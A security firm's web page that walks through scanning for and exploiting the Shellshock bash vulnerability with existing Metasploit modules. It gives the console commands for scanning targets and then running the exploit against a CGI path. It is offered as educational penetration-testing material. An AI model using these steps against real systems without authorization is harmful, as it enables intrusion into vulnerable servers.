• HOME

  • ABOUT US

  • SERVICES

  • CONTACT

  • KNOWLEDGE

  • BUY ONLINE

  • More

    CYBER SECURITY ASSESSMENTS // PENETRATION TESTING // DATA SECURITY // IT SECURITY // SECURITY AUDITS // DIGITAL FORENSICS // CYBER INTELLIGENCE

    IT Consulting | Online Security | Network Security | Computer Security

    Trojan Horse Security offers official testing and certification as a Certified Cyber Hacker (CCH).

    Click here for more information.

    SHELLSHOCK

    TROJAN HORSE SECURITY IS TEACHING THESE CONCEPTS FOR EDUCATIONAL PURPOSES ONLY. WE DO NOT CONDONE ILLEGAL HACKING. TROJAN HORSE SECURITY CONSULTANTS ARE HIRED AS ETHICAL HACKERS AT THE REQUEST OF ORGANIZATIONS WITH PERMISSION TO HACK THEIR NETWORKS AND SYSTEMS.

     

     

    Shellshock was another one of those exploits that was very impactful across the IT industry. Some said it was Heartbleed 2.0.

     

    There are already many Metasploit modules evailable for Shellshock including:

     

    > auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
    > auxiliary/server/dhclient_bash_env.rb
    > exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
    > exploits/osx/local/vmware_bash_function_root.rb

     

     

    Let's try one...Start by launching Metasploit. Remember to start the database service!

     

    # service postgresql start

    /opt/metasploit/app# ./msfconsole

     

    Once launched, use the following commands to scan for vulnerable systems:

     

    msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env

    msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env) > set RHOSTS <TARGETS>

    RHOSTS=> <TARGETS>

    msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/printenv.cgi
    TARGETURI=> /cgi-bin/printenv.cgi

    msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env) > run

     

    Once a vulnerable system is discovered, it can be exploited using the following module:

     

    msf > use exploits/multi/http/apache_mod_cgi_bash_env_exec

    msf exploit(apache_mod_cgi_bash_env_exec) > set RHOST 192.168.1.1
    RHOST=> 192.168.1.1

    msf auxiliary(\(\(\(\(apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/printenv.cgi
    TARGETURI=> /cgi-bin/printenv.cgi

    msf exploit(apache_mod_cgi_bash_env_exec) > run

     

    There are many ways to expoit this vulnerability. Try out a few different ways and see for your self why it is so dangerous.

    CONTACT US

    Trojan 1 | PCI Compliance | HIPAA Compliance | GLBA Compliance | GDPR Compliance | Penetration Testing | Web Application Assessment | Corporate Security Assessment | Cyber Threat Intelligence 24 / 7

     

    Cyber Breach Lawyers | Vulnerability Assessments | CISO On Demand | Black Ops | Secure Cloud | Personal Security Assessments | Small Business IT Security  | NY Cybersecurity Rule 23 NYCRR 500

     

    Ethical Hacking for Small Businesses | IT Compliance Small Business | Security Breach Management Solutions | Big Data Security | Corporate Randsomware

     

    Website Security for Small Businesses | Security Consulting Services | Enterprise Security Services | Drone & Robotic IT Security

     

    Complete IT/Cyber Security Assessment |  Security Governance Services | Security & Risk Management | Digital Forensics

     

    Social Engineering Testing  | Cyber Liability Insurance | Data Centers Transformation & Security | Secure Access and Continuity Solutions

     

    Mobility Management  & Security | Network Management  Security Solutions | EndPoint Security Solutions |  National Vulnerability Database

    2200 PENNSYLVANIA AVENUE | NW | 4TH FLOOR EAST​ | WASHINGTON, D.C. 20037​

    ​​Tel: 202.507.5773 | Fax: 202.507.5601​ |  ContactUs@TrojanHorseSecurity.com

     

    • s-linkedin
    • s-facebook
    • Google Metallic
    • YouTube Metallic
    • Pinterest Metallic
    • s-tbird

    © 2020  TROJAN HORSE SECURITY INC

    • HOME

    • ABOUT US

    • SERVICES

    • CONTACT

    • KNOWLEDGE

    • BUY ONLINE

    • More